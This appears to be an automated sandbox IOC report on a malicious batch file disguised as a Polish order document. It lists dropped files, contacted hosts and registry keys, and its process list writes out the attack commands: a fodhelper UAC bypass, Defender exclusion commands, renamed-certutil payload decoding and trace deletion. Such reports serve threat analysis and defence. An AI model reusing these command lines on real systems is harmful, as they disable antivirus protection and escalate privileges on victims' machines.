IOC Report
Zam#U00f3wienie_27900045542300.CMD.cmd

loading gif

Files

File Path
Type
Category
Malicious
Zam#U00f3wienie_27900045542300.CMD.cmd
Unicode text, UTF-8 text, with very long lines (2868), with CRLF line terminators
initial sample
malicious
C:\Users\Public\Clwwfhzo.url
MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Clwwfhzo.PIF">), ASCII text, with CRLF line terminators
dropped
malicious
C:\Users\Public\Libraries\Clwwfhzo
data
dropped
malicious
C:\Users\Public\Libraries\Clwwfhzo.PIF
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\Public\Libraries\Lewxa.com
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Windows \System32\7922836.exe
PE32+ executable (GUI) x86-64, for MS Windows
dropped
malicious
C:\Windows \System32\netutils.dll
PE32+ executable (DLL) (console) x86-64, for MS Windows
dropped
malicious
C:\Users\Public\Lewxa.txt
ASCII text, with very long lines (65536), with no line terminators
dropped
C:\Users\Public\Libraries\Null
ASCII text, with CRLF line terminators
dropped
C:\Users\Public\alpha.exe
PE32+ executable (console) x86-64, for MS Windows
modified
C:\Users\Public\kn.exe
PE32+ executable (console) x86-64, for MS Windows
modified
C:\Users\Public\xkn.exe
PE32+ executable (console) x86-64, for MS Windows
modified
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\xkn.exe.log
CSV text
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\json[1].json
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aarqkiin.xxk.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dncaohnh.xgv.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p3guirpa.a0t.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tytwoaxk.sk2.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xxrtx1ko.px2.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ya15wy4u.qfa.ps1
ASCII text, with no line terminators
dropped
C:\Windows \System32\KDECO.bat
DOS batch file, Unicode text, UTF-8 text, with very long lines (432), with CRLF line terminators
dropped
\Device\Null
ASCII text, with CRLF line terminators
dropped
There are 13 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Zam#U00f3wienie_27900045542300.CMD.cmd" "
malicious
C:\Windows\System32\cmd.exe
cmd /c extrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe
malicious
C:\Windows\System32\extrac32.exe
extrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe
malicious
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe
malicious
C:\Windows\System32\extrac32.exe
extrac32.exe /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe
malicious
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
malicious
C:\Windows\System32\extrac32.exe
extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
malicious
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "
malicious
C:\Users\Public\xkn.exe
C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "
malicious
C:\Users\Public\alpha.exe
"C:\Users\Public\alpha.exe" /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "
malicious
C:\Windows\System32\reg.exe
reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "
malicious
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Zam#U00f3wienie_27900045542300.CMD.cmd" "C:\\Users\\Public\\Lewxa.txt" 9
malicious
C:\Users\Public\kn.exe
C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Zam#U00f3wienie_27900045542300.CMD.cmd" "C:\\Users\\Public\\Lewxa.txt" 9
malicious
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Lewxa.txt" "C:\\Users\\Public\\Libraries\\Lewxa.com" 12
malicious
C:\Users\Public\kn.exe
C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Lewxa.txt" "C:\\Users\\Public\\Libraries\\Lewxa.com" 12
malicious
C:\Users\Public\Libraries\Lewxa.com
C:\\Users\\Public\\Libraries\\Lewxa.com
malicious
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del "C:\Users\Public\Lewxa" / A / F / Q / S
malicious
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del "C:\Users\Public\Lewxa.txt" / A / F / Q / S
malicious
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del "C:\Users\Public\xkn.exe" / A / F / Q / S
malicious
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del "C:\Users\Public\kn.exe" / A / F / Q / S
malicious
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
malicious
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettingsAdminFlows.exe
malicious
C:\Windows\SysWOW64\cmd.exe
cmd /c mkdir "\\?\C:\Windows "
malicious
C:\Windows\SysWOW64\cmd.exe
cmd /c mkdir "\\?\C:\Windows \System32"
malicious
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Windows \System32\7922836.exe"
malicious
C:\Windows \System32\7922836.exe
"C:\Windows \System32\7922836.exe"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\windows \system32\KDECO.bat""
malicious
C:\Windows\System32\cmd.exe
cmd /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
malicious
C:\Windows\SysWOW64\extrac32.exe
C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\Public\Libraries\Lewxa.com C:\\Users\\Public\\Libraries\\Clwwfhzo.PIF
malicious
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\System32\SndVol.exe
malicious
C:\Users\Public\Libraries\Clwwfhzo.PIF
"C:\Users\Public\Libraries\Clwwfhzo.PIF"
malicious
C:\Windows\SysWOW64\colorcpl.exe
C:\Windows\System32\colorcpl.exe
malicious
C:\Users\Public\Libraries\Clwwfhzo.PIF
"C:\Users\Public\Libraries\Clwwfhzo.PIF"
malicious
C:\Windows\SysWOW64\colorcpl.exe
C:\Windows\System32\colorcpl.exe
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\SystemSettingsAdminFlows.exe
"C:\Windows\system32\SystemSettingsAdminFlows.exe" OptionalFeaturesAdminHelper
C:\Windows\System32\taskkill.exe
taskkill /F /IM SystemSettings.exe
C:\Windows\System32\taskkill.exe
taskkill /F /IM SystemSettingsAdminFlows.exe
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\wbem\WmiPrvSE.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
There are 35 hidden processes, click here to show them.

URLs

Name
IP
Malicious
!htalatsuirity.ddnsfree.com
malicious
http://geoplugin.net/json.gp/C
unknown
malicious
http://pesterbdd.com/images/Pester.png
unknown
malicious
http://geoplugin.net/json.gp
178.237.33.50
malicious
https://%ws/%ws_%ws_%ws/service.svc/%wsADPolicyProviderSCEP
unknown
https://login.microsoftonline.com/%s/oauth2/authorize
unknown
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
unknown
http://ocsp.sectigo.com0
unknown
https://go.microsoft.co
unknown
http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
unknown
https://contoso.com/License
unknown
https://github.com/ch2sh/BatCloakG
unknown
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
unknown
http://geoplugin.net/json.gp5
unknown
https://enterpriseregistration.windows.net/EnrollmentServer/key/
unknown
https://onedrive.live.com/
unknown
https://login.windows.local
unknown
http://geoplugin.net/json.gpP
unknown
https://contoso.com/
unknown
https://live.com/
unknown
https://nuget.org/nuget.exe
unknown
https://oneget.orgX
unknown
https://onedrive.live.com/download?resid=F8C2FFBD7FDE3058%21109&authkey=
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://%ws/%ws_%ws_%ws/service.svc/%ws
unknown
https://enterpriseregistration.windows.net/EnrollmentServer/device/
unknown
https://dztchg.bl.files.1drv.com/y4mehZc5BynsDMfJX6uNk2OZuOk6aKCOdUy2pWop0SAqNiM54FnD7EXoVwTl49wu1_q
unknown
http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
unknown
https://onedrive.live.com/download?resid=F8C2FFBD7FDE3058%21109&authkey=!AGjZ9DjRybSg7WA
13.107.137.11
http://nuget.org/NuGet.exe
unknown
http://www.apache.org/licenses/LICENSE-2.0
unknown
https://sectigo.com/CPS0
unknown
https://login.microsoftonline.com/%s/oauth2/token
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://leibk.com/pufpufooootools/150_Clwwfhzotee
193.143.77.18
https://contoso.com/Icon
unknown
https://leibk.com:443/pufpufooootools/150_Clwwfhzotee
unknown
https://leibk.com/
unknown
https://github.com/Pester/Pester
unknown
http://geoplugin.net/json.gpSystem32
unknown
https://onedrive.live.com/download?resid
unknown
https://login.microsoftonline.com/%s/oauth2/authorizeJoinStatusStorage::SetDefaultDiscoveryMetadatah
unknown
http://geoplugin.net/
unknown
https://dztchg.bl.files.1drv.com/
unknown
https://onedrive.live.com/download?resid=F8C2FFBD7FDE3058%21109&u
unknown
https://enterpriseregistration.windows.net/EnrollmentServer/DeviceEnrollmentWebService.svc
unknown
https://aka.ms/pscore68
unknown
http://www.pmail.com
unknown
http://geoplugin.net/json.gp~6~
unknown
http://ocsp.sectigo.com0C
unknown
https://oneget.org
unknown
There are 41 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
dual-spov-0006.spov-msedge.net
13.107.137.11
malicious
cxcs.microsoft.net
unknown
malicious
setimetntalatsuirity.ddnsfree.com
94.156.69.245
leibk.com
193.143.77.18
geoplugin.net
178.237.33.50
onedrive.live.com
unknown
dztchg.bl.files.1drv.com
unknown

IPs

IP
Domain
Country
Malicious
13.107.137.11
dual-spov-0006.spov-msedge.net
United States
malicious
193.143.77.18
leibk.com
Poland
94.156.69.245
setimetntalatsuirity.ddnsfree.com
Bulgaria
178.237.33.50
geoplugin.net
Netherlands

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Clwwfhzo
malicious
HKEY_CURRENT_USER_Classes\ms-settings\shell\open\command
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.60.3.1!7
Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.60.3.2!7
Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.60.3.3!7
Name
HKEY_CURRENT_USER\SOFTWARE\Rmc00-CS8S4A
exepath
HKEY_CURRENT_USER\SOFTWARE\Rmc00-CS8S4A
licence
HKEY_CURRENT_USER\SOFTWARE\Rmc00-CS8S4A
time
HKEY_CURRENT_USER_Classes\Local Settings\MuiCache\24\417C44EB
@%systemroot%\system32\colorui.dll,-1400
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ICM\ProfileAssociations\Print\Fax
UsePerUserProfiles

Memdumps

Base Address
Regiontype
Protect
Malicious
4031000
direct allocation
page execute read
malicious
35B0000
heap
page read and write
malicious
287C000
heap
page read and write
malicious
284F000
heap
page read and write
malicious
3599000
heap
page read and write
malicious
7190000
remote allocation
page execute and read and write
malicious
3FC1000
direct allocation
page execute read
malicious
2D3A000
heap
page read and write
malicious
7FC90000
direct allocation
page read and write
malicious
2D3A000
heap
page read and write
malicious
3547000
heap
page read and write
malicious
3FA1000
direct allocation
page execute read
malicious
35AE000
heap
page read and write
malicious
6950000
remote allocation
page execute and read and write
malicious
5300000
remote allocation
page execute and read and write
malicious
21B3000
direct allocation
page read and write
malicious
400000
direct allocation
page execute and read and write
malicious
400000
direct allocation
page execute and read and write
malicious
400000
direct allocation
page execute and read and write
malicious
26F69A2B000
heap
page read and write
26E4EE65000
heap
page read and write
2857000
heap
page read and write
27B09515000
heap
page read and write
7D2000
heap
page read and write
A94D87E000
stack
page read and write
26F6B3F0000
heap
page read and write
7FF6C3670000
unkown
page readonly
7FF6C36A2000
unkown
page readonly
285C000
heap
page read and write
7FF6C36AD000
unkown
page write copy
492F000
stack
page read and write
7FF7E1A76000
unkown
page readonly
7FBA0000
direct allocation
page read and write
246EE580000
heap
page read and write
7FF738F6D000
unkown
page readonly
15271770000
heap
page read and write
2A69000
stack
page read and write
33F0000
heap
page read and write
1F400DCC000
heap
page read and write
7FFD9BB80000
trusted library allocation
page execute and read and write
841000
heap
page read and write
7FF738F6C000
unkown
page write copy
1C132BC0000
heap
page read and write
7DD000
heap
page read and write
7FF6C36AD000
unkown
page write copy
7FFD9BB92000
trusted library allocation
page read and write
7FF6C36C9000
unkown
page readonly
2743000
heap
page read and write
323C000
stack
page read and write
23FE09E0000
heap
page read and write
20B1963D000
heap
page read and write
7FFD9BC20000
trusted library allocation
page read and write
152718E0000
heap
page read and write
489A5FE000
stack
page read and write
2A08000
direct allocation
page read and write
7F670000
direct allocation
page read and write
9B5B07B000
stack
page read and write
1F1B27F0000
heap
page read and write
4CB000
unkown
page read and write
29EDF970000
heap
page read and write
72F000
stack
page read and write
1F1B3CB9000
trusted library allocation
page read and write
20B1965F000
heap
page read and write
7F610000
direct allocation
page read and write
20D69620000
heap
page read and write
1CD34745000
heap
page read and write
7C86B4E000
stack
page read and write
27B09514000
heap
page read and write
4CD000
unkown
page read and write
7DF465A40000
trusted library allocation
page execute and read and write
1F400D9C000
heap
page read and write
7FF6C36B1000
unkown
page read and write
2B7F000
stack
page read and write
41957FF000
stack
page read and write
7FFD9BA70000
trusted library allocation
page execute and read and write
21A42840000
heap
page read and write
1F400DAD000
heap
page read and write
27B09515000
heap
page read and write
7F3E0000
direct allocation
page read and write
2840000
direct allocation
page read and write
20E1C066000
heap
page read and write
474000
direct allocation
page execute and read and write
3587000
heap
page read and write
7FF7E1A5A000
unkown
page write copy
222F000
direct allocation
page read and write
7FF6C3670000
unkown
page readonly
235F5860000
heap
page read and write
1F1B3F9F000
trusted library allocation
page read and write
7FF7E1A68000
unkown
page read and write
7FF6C3670000
unkown
page readonly
15FF1000
heap
page read and write
7FF6C36B9000
unkown
page read and write
845000
heap
page read and write
299F000
direct allocation
page read and write
6F5000
heap
page read and write
154CE000
stack
page read and write
87D000
heap
page read and write
1F1B27F5000
heap
page read and write
7FF6C36B1000
unkown
page read and write
7FF6C36C9000
unkown
page readonly
15870000
remote allocation
page read and write
35B0000
heap
page read and write
2CFF000
stack
page read and write
31AE000
heap
page read and write
7FF6C3670000
unkown
page readonly
2B76000
heap
page read and write
61E000
stack
page read and write
7F640000
direct allocation
page read and write
21A42830000
heap
page read and write
620000
heap
page read and write
319B000
heap
page read and write
7FFD9BBB0000
trusted library allocation
page read and write
2828000
heap
page read and write
7EDD0000
direct allocation
page read and write
4114000
direct allocation
page read and write
15DA9000
heap
page read and write
7FF6C36AD000
unkown
page read and write
1F1CB156000
heap
page read and write
248FE177000
heap
page read and write
2242000
direct allocation
page read and write
1E61E000
stack
page read and write
2C60000
heap
page read and write
7FBA0000
direct allocation
page read and write
9B5ABAD000
stack
page read and write
1F1CAD20000
heap
page execute and read and write
14C571E0000
heap
page read and write
2210000
heap
page read and write
29EDF940000
heap
page read and write
1F400D8F000
heap
page read and write
7FF6C3670000
unkown
page readonly
7F640000
direct allocation
page read and write
7FF7E18E1000
unkown
page execute read
827000
heap
page read and write
7FFD9B9B3000
trusted library allocation
page execute and read and write
2896000
direct allocation
page read and write
257B000
stack
page read and write
7FF7E1A5A000
unkown
page write copy
22C0000
heap
page read and write
7FF7E1A6D000
unkown
page readonly
2628000
direct allocation
page read and write
7FF7E1A78000
unkown
page readonly
7FF6C36AD000
unkown
page read and write
A1E000
stack
page read and write
B1DDCFF000
stack
page read and write
14C571A0000
heap
page read and write
8AB000
heap
page read and write
895000
heap
page read and write
1F1B27FA000
heap
page read and write
7DA000
heap
page read and write
7FF7E19FE000
unkown
page readonly
26F69A2B000
heap
page read and write
22D000
stack
page read and write
7FF62275A000
unkown
page readonly
2D58000
heap
page read and write
7FF6C36AD000
unkown
page write copy
7FF7E1A6D000
unkown
page readonly
1D6D0D30000
heap
page read and write
2649000
direct allocation
page read and write
23FE09D0000
heap
page read and write
1F400C20000
heap
page read and write
305A000
heap
page read and write
3FCC000
direct allocation
page read and write
1560E000
stack
page read and write
1571F000
stack
page read and write
2AF989A0000
heap
page read and write
F1CAEFF000
stack
page read and write
7F44F000
direct allocation
page read and write
2971000
direct allocation
page read and write
2963000
direct allocation
page read and write
7FF6C36AD000
unkown
page read and write
246EE590000
heap
page read and write
2638000
direct allocation
page read and write
4840000
heap
page read and write
1F400DC9000
heap
page read and write
7FF6C36AD000
unkown
page write copy
26F69A28000
heap
page read and write
29E4000
direct allocation
page read and write
15800000
trusted library allocation
page read and write
20B195A0000
heap
page read and write
338F000
unkown
page read and write
7FD80000
direct allocation
page read and write
1F1B2660000
heap
page read and write
1F1C2B50000
trusted library allocation
page read and write
CCEE5FF000
stack
page read and write
2320000
heap
page read and write
7F520000
direct allocation
page read and write
7FF7E1A63000
unkown
page read and write
34CF000
stack
page read and write
15B6D000
heap
page read and write
1F400D00000
heap
page read and write
7FF6C36A2000
unkown
page readonly
7FF7E18E1000
unkown
page execute read
7FF6C3670000
unkown
page readonly
613C9000
unkown
page readonly
45F000
unkown
page read and write
627000
heap
page read and write
246EE7D0000
heap
page read and write
7FF000
stack
page read and write
1F1CAE44000
heap
page read and write
849000
heap
page read and write
27B09513000
heap
page read and write
2F8F000
stack
page read and write
160DE000
heap
page read and write
2871000
heap
page read and write
7FF6C36C9000
unkown
page readonly
3556000
heap
page read and write
7EEE0000
direct allocation
page read and write
7F480000
direct allocation
page read and write
7FF738F6C000
unkown
page read and write
7FF738F50000
unkown
page readonly
235F56B0000
heap
page read and write
3280000
heap
page read and write
15FF0000
heap
page read and write
2BDE000
stack
page read and write
9B5AEFD000
stack
page read and write
271E3207000
heap
page read and write
7FF6C36C9000
unkown
page readonly
7FF6C3671000
unkown
page execute read
1F1B0E60000
heap
page read and write
7FFD9BCC0000
trusted library allocation
page read and write
7FF738F50000
unkown
page readonly
7FF6C3671000
unkown
page execute read
7FF6C3671000
unkown
page execute read
27B09759000
heap
page read and write
7FF6C36BF000
unkown
page read and write
2535000
stack
page read and write
1F1B3FA7000
trusted library allocation
page read and write
854000
heap
page read and write
291B000
heap
page read and write
7FF6C36BF000
unkown
page read and write
7FF622750000
unkown
page readonly
20B19659000
heap
page read and write
221C000
stack
page read and write
7FF6C3671000
unkown
page execute read
1C130E84000
heap
page read and write
15FF3000
heap
page read and write
489A47B000
stack
page read and write
645000
heap
page read and write
1CD34950000
heap
page read and write
7FF7E1A76000
unkown
page readonly
1F1B4766000
trusted library allocation
page read and write
1536F000
stack
page read and write
1F400D35000
heap
page read and write
2B70000
heap
page read and write
26F699A0000
heap
page read and write
27B09514000
heap
page read and write
7FFD9BC80000
trusted library allocation
page read and write
3D13CD000
stack
page read and write
2AF988A7000
heap
page read and write
84F000
heap
page read and write
693000
heap
page read and write
271E33D0000
heap
page read and write
227E000
stack
page read and write
64E000
stack
page read and write
26F69980000
heap
page read and write
27B09516000
heap
page read and write
2CBD000
stack
page read and write
9BF000
stack
page read and write
26E4EB80000
heap
page read and write
29D6000
direct allocation
page read and write
20B19610000
heap
page read and write
15A293E000
stack
page read and write
7FF6C36B1000
unkown
page read and write
27B09760000
heap
page read and write
7FFD9B9B4000
trusted library allocation
page read and write
7FF6C3671000
unkown
page execute read
7F040000
direct allocation
page read and write
7FFD9BCB0000
trusted library allocation
page read and write
7FFD9BCE0000
trusted library allocation
page read and write
7FF6C36A2000
unkown
page readonly
1C130E20000
heap
page read and write
28BB000
heap
page read and write
48EE000
stack
page read and write
2298000
direct allocation
page read and write
6F7000
heap
page read and write
20E1BFB0000
heap
page read and write
15701000
heap
page read and write
2CA0000
heap
page read and write
27B094B0000
heap
page read and write
2389000
direct allocation
page read and write
7FF6C36CD000
unkown
page readonly
29EDFA00000
heap
page read and write
7FFD9B9C0000
trusted library allocation
page read and write
25C0000
heap
page read and write
851000
heap
page read and write
4FB0000
heap
page read and write
5ED4BFF000
stack
page read and write
1F1B0DCB000
heap
page read and write
26570180000
heap
page read and write
27B09513000
heap
page read and write
29FA000
direct allocation
page read and write
20B19945000
heap
page read and write
7FF6C36AD000
unkown
page read and write
23FE09D4000
heap
page read and write
77CBAFF000
stack
page read and write
7FF6C3670000
unkown
page readonly
7FF6C36CD000
unkown
page readonly
20B1961F000
heap
page read and write
F1CADFF000
stack
page read and write
FE0ABFE000
stack
page read and write
7EE00000
direct allocation
page read and write
152718D4000
heap
page read and write
2D1E000
stack
page read and write
23FE09B0000
heap
page read and write
7EFB0000
direct allocation
page read and write
7EF70000
direct allocation
page read and write
26E4ED10000
heap
page read and write
A94D4BB000
stack
page read and write
2881000
heap
page read and write
3030000
heap
page read and write
1561E000
stack
page read and write
27B09513000
heap
page read and write
1C132FA2000
heap
page read and write
21B0000
direct allocation
page execute and read and write
7FF6C36CC000
unkown
page write copy
1F1C2B41000
trusted library allocation
page read and write
15EBA000
heap
page read and write
7FF6C36B1000
unkown
page read and write
33CE000
stack
page read and write
27B09513000
heap
page read and write
2C7E000
stack
page read and write
647000
heap
page read and write
4F6E000
stack
page read and write
2657006B000
heap
page read and write
1F1B2760000
trusted library allocation
page read and write
15DA4000
heap
page read and write
1E65F000
stack
page read and write
7F000000
direct allocation
page read and write
7FF7E1A75000
unkown
page write copy
1F1B0E28000
heap
page read and write
248FE090000
heap
page read and write
20B19618000
heap
page read and write
4D4000
unkown
page readonly
21A428C9000
heap
page read and write
1F400D40000
heap
page read and write
56D67C000
stack
page read and write
20B19570000
heap
page read and write
2AF987F0000
heap
page read and write
7F000000
direct allocation
page read and write
27B09515000
heap
page read and write
1F1B0EA0000
heap
page read and write
7FF6C36CC000
unkown
page write copy
26E4ECC0000
heap
page read and write
7FFD9BBA0000
trusted library allocation
page execute and read and write
288F000
heap
page read and write
7F4B0000
direct allocation
page read and write
7FF7E18E0000
unkown
page readonly
61E000
stack
page read and write
2AF98710000
heap
page read and write
15870000
remote allocation
page read and write
20D69924000
heap
page read and write
8A8000
heap
page read and write
7FF6C36A2000
unkown
page readonly
2AF988C2000
heap
page read and write
2AAC000
stack
page read and write
2180000
heap
page read and write
29EDFC90000
heap
page read and write
27B09516000
heap
page read and write
7FF6C36C9000
unkown
page readonly
1F400DCC000
heap
page read and write
7FF6C36B1000
unkown
page read and write
7FF6C36B1000
unkown
page read and write
29CF000
direct allocation
page read and write
7EB10000
direct allocation
page read and write
1F1C2CF5000
trusted library allocation
page read and write
27B09516000
heap
page read and write
5BE32FF000
stack
page read and write
29EDFC80000
heap
page read and write
272E000
stack
page read and write
1F1B2700000
heap
page execute and read and write
800000
heap
page read and write
7FF6C36C9000
unkown
page readonly
7C0000
heap
page read and write
7FF6C3670000
unkown
page readonly
159C0000
heap
page read and write
7F550000
direct allocation
page read and write
7FF6C36AD000
unkown
page read and write
2C30000
heap
page read and write
1CD34954000
heap
page read and write
2274000
direct allocation
page read and write
226D000
direct allocation
page read and write
7FF7E1A5A000
unkown
page write copy
155CD000
stack
page read and write
7FF6C3670000
unkown
page readonly
613C5000
unkown
page readonly
7FF6C36C9000
unkown
page readonly
5380000
heap
page read and write
248FE070000
heap
page read and write
20E1BFA5000
heap
page read and write
227C000
direct allocation
page read and write
2763000
heap
page read and write
40F4000
direct allocation
page read and write
56DAFE000
stack
page read and write
1F1CADA6000
heap
page read and write
7FF6C36B5000
unkown
page read and write
1538E000
stack
page read and write
7F410000
direct allocation
page read and write
235F5787000
heap
page read and write
27B09516000
heap
page read and write
868000
heap
page read and write
1F402BC0000
trusted library allocation
page read and write
56D57E000
stack
page read and write
3D134E000
stack
page read and write
27B09514000
heap
page read and write
235F5785000
heap
page read and write
1C132BC3000
heap
page read and write
7F390000
direct allocation
page read and write
7FF6C36BF000
unkown
page read and write
1D6D1070000
heap
page read and write
2D3A000
heap
page read and write
26E4EBDF000
heap
page read and write
2D51000
heap
page read and write
2983000
direct allocation
page read and write
405C000
direct allocation
page read and write
2974000
direct allocation
page read and write
7FF6C3671000
unkown
page execute read
155EE000
stack
page read and write
20B1965D000
heap
page read and write
56D7FE000
stack
page read and write
20B1962B000
heap
page read and write
1F1B0D72000
heap
page read and write
7FF6C36C9000
unkown
page readonly
7FF6C3671000
unkown
page execute read
3190000
heap
page read and write
1CD34749000
heap
page read and write
29DD000
direct allocation
page read and write
1F1B0C80000
heap
page read and write
7FF6C36C4000
unkown
page read and write
650000
heap
page read and write
640000
heap
page read and write
27B094C0000
heap
page read and write
3D12CC000
stack
page read and write
246EE9B4000
heap
page read and write
7FF6C36C9000
unkown
page readonly
2C5E000
stack
page read and write
20B19655000
heap
page read and write
848000
heap
page read and write
2674000
direct allocation
page read and write
2F0E000
stack
page read and write
20E1C04B000
heap
page read and write
C80038C000
stack
page read and write
235F5787000
heap
page read and write
239D000
stack
page read and write
2DBD000
stack
page read and write
15820000
trusted library allocation
page read and write
5F90000
heap
page read and write
7FF6C36B9000
unkown
page read and write
CCEE4FC000
stack
page read and write
7EFB0000
direct allocation
page read and write
56D4FE000
stack
page read and write
285B000
direct allocation
page read and write
848000
heap
page read and write
56E64E000
stack
page read and write
156EF000
stack
page read and write
5ED4AFC000
stack
page read and write
26E4EBA8000
heap
page read and write
2B9F000
stack
page read and write
400000
unkown
page readonly
29E5000
heap
page read and write
7FF6C36CC000
unkown
page write copy
1D6D0E10000
heap
page read and write
235F5787000
heap
page read and write
1F400D95000
heap
page read and write
317E000
unkown
page read and write
2954000
direct allocation
page read and write
271E31E0000
heap
page read and write
2291000
direct allocation
page read and write
26F69A0C000
heap
page read and write
7FF6C3671000
unkown
page execute read
1F400D9C000
heap
page read and write
7FF6C36AD000
unkown
page read and write
1F1CAE90000
heap
page read and write
41956FD000
stack
page read and write
29EDFA0B000
heap
page read and write
27B09513000
heap
page read and write
26570060000
heap
page read and write
7FFD9BC30000
trusted library allocation
page read and write
99F000
stack
page read and write
56D8F7000
stack
page read and write
26570045000
heap
page read and write
2910000
heap
page read and write
7FF6C36CC000
unkown
page write copy
1F400D98000
heap
page read and write
1F1B3772000
trusted library allocation
page read and write
B1DDBFE000
stack
page read and write
7FF6C36AD000
unkown
page write copy
1F400D80000
heap
page read and write
34B8000
heap
page read and write
2CFE000
stack
page read and write
15A28BD000
stack
page read and write
F6434FE000
stack
page read and write
29EDFA27000
heap
page read and write
7FF7E1A6D000
unkown
page readonly
7FFD9BA60000
trusted library allocation
page read and write
401C000
direct allocation
page read and write
7FF6C36B1000
unkown
page read and write
F6432FB000
stack
page read and write
1F1B26A0000
trusted library allocation
page read and write
7FF6C3670000
unkown
page readonly
1CD34700000
heap
page read and write
7FF6C36C4000
unkown
page read and write
